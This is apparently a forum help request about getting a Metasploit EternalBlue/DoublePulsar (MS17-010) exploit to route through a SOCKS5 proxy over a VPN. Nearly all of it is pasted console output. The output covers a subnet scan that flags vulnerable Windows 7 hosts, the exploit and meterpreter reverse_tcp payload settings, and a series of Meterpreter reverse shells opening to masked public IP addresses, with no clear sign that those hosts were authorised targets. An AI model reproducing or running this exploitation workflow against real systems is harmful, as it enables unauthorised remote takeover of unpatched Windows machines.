Eternalblue going public rather than sock



staggerlee
2020-01-23, 10:45
Hi all,


I am trying to run some personal ms17_010 pen testing over a SOCKS5 proxy that is port-forwarded over a VPN.


The primary issue I am trying to resolve is getting the Eternalblue data to traverse the SOCKS proxy using "set ReverseAllowProxy true"; it may be that this is simply not supported.
The SOCKS setup itself does work: I am able to run the setup on Windows and successfully tunnel an IP range scan through the tunnel using Proxify.
It looks like the route is attempting to use the public IP address of the SOCKS proxy and/or target machine, rather than the loopback SOCKS path.


Below, I have added some of the output and examples of the config/method I am attempting. This is my first attempt at this.


A couple of things to note:
I have removed the public IP addresses from the output.
I have also tried setting PROCESSINJECT = lsass.exe and TARGETARCHITECTURE = x64; these gave the same results as posted.
10.7.0.62 is the private address of tun0 (the VPN interface).
Port 8484 is open through the VPN via port forwarding. It is not in use prior to running.
Kali Version - 2020.1
Kali Installation - VirtualBox VM, running the installed version.

Any suggestions are appreciated.

Thanks

=[ metasploit v5.0.70-dev ]
+ -- --=[ 1961 exploits - 1091 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]


msf5 > setg Proxies socks5:127.0.0.1:57366
Proxies => socks5:127.0.0.1:57366
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.2.1/24
rhosts => 192.168.2.1/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 64
threads => 64
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit -j
Auxiliary module running as background job 0.
msf5 auxiliary(scanner/smb/smb_ms17_010) >
192.168.2.1/24:445 - Scanned 34 of 256 hosts (13% complete)
192.168.2.1/24:445 - Scanned 60 of 256 hosts (23% complete)
[+] 192.168.2.103:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.106:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
----------
---EXAMPLE of detected hosts---
----------

msf5 exploit(windows/smb/eternalblue_doublepulsar) > use exploit/windows/smb/eternalblue_doublepulsar
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
Exploit running as background job 1.
Exploit completed, but no session was created.


[-] 192.168.2.103:445 - Exploit failed: RuntimeError TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour.
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set ReverseAllowProxy true
ReverseAllowProxy => true
----------
---EXAMPLE of setting ReverseAllowProxy true---
----------



msf5 exploit(windows/smb/eternalblue_doublepulsar) > options


Module options (exploit/windows/smb/eternalblue_doublepulsar):


Name                Current Setting                                   Required  Description
----                ---------------                                   --------  -----------
DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/   yes       Path directory of Doublepulsar
ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/   yes       Path directory of Eternalblue
PROCESSINJECT       explorer.exe                                      yes       Name of process to inject into (Change to lsass.exe for x64)
RHOSTS              192.168.2.103                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT               445                                               yes       The SMB service port (TCP)
TARGETARCHITECTURE  x86                                               yes       Target Architecture (Accepted: x86, x64)
WINEPATH            /root/.wine/drive_c/                              yes       WINE drive_c path

Payload options (windows/meterpreter/reverse_tcp):


Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     10.7.0.62        yes       The listen address (an interface may be specified)
LPORT     8484             yes       The listen port

Exploit target:


Id  Name
--  ----
8   Windows 7 (all services pack) (x86) (x64)

msf5 exploit(windows/smb/eternalblue_doublepulsar) >
----------
---EXAMPLE of set options---
----------

msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
Exploit running as background job 0.
Exploit completed, but no session was created.

Started reverse TCP handler on 10.7.0.62:8484
msf5 exploit(windows/smb/eternalblue_doublepulsar) >
192.168.2.103:445 - Generating Eternalblue XML data
192.168.2.103:445 - Generating Doublepulsar XML data
192.168.2.103:445 - Generating payload DLL for Doublepulsar
192.168.2.103:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
192.168.2.103:445 - Launching Eternalblue...
Sending stage (180291 bytes) to 45.x.x.x
Meterpreter session 1 opened (10.7.0.62:8484 -> 45.x.x.x:52873) at 2020-01-23 09:59:22 +0000
Sending stage (180291 bytes) to 45.x.x.x
Meterpreter session 2 opened (10.7.0.62:8484 -> 45.x.x.x:52872) at 2020-01-23 09:59:24 +0000
Sending stage (180291 bytes) to 115.x.x.x
192.168.2.103 - Meterpreter session 2 closed. Reason: Died
Meterpreter session 3 opened (10.7.0.62:8484 -> 115.x.x.x:51837) at 2020-01-23 09:59:25 +0000
Sending stage (180291 bytes) to 45.x.x.x
192.168.2.103 - Meterpreter session 3 closed. Reason: Died
Meterpreter session 4 opened (10.7.0.62:8484 -> 45.x.x.x:52874) at 2020-01-23 09:59:27 +0000
Sending stage (180291 bytes) to 115.x.x.x
192.168.2.103 - Meterpreter session 4 closed. Reason: Died
Meterpreter session 5 opened (10.7.0.62:8484 -> 115.x.x.x:51838) at 2020-01-23 09:59:29 +0000
Sending stage (180291 bytes) to 45.x.x.x
192.168.2.103 - Meterpreter session 5 closed. Reason: Died
Meterpreter session 6 opened (10.7.0.62:8484 -> 45.x.x.x:52876) at 2020-01-23 09:59:30 +0000
Sending stage (180291 bytes) to 115.x.x.x
192.168.2.103 - Meterpreter session 6 closed. Reason: Died
Meterpreter session 7 opened (10.7.0.62:8484 -> 115.x.x.x:51839) at 2020-01-23 09:59:31 +0000